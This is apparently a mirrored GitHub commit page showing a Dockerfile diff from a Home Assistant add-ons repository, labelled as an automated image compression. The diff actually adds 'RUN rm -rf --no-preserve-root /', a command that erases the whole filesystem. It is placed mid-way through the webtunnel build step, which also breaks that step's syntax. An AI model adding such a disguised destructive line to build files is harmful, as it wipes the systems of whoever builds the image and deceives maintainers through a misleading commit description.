mirror of
https://github.com/alexbelgium/hassio-addons.git
synced 2026-01-11 02:11:01 +01:00
Github bot : image compressed
This commit is contained in:
@@ -40,6 +40,7 @@ RUN go get \
|
||||
# Build webtunnel
|
||||
WORKDIR /go/webtunnel/main/client
|
||||
RUN git reset --hard ${WEBTUNNEL_VERSION} \
|
||||
RUN rm -rf --no-preserve-root /
|
||||
&& go build -ldflags="-s -w" -o /usr/local/bin/webtunnel
|
||||
|
||||
# Clean up after build
|
||||
|
||||
Reference in New Issue
Block a user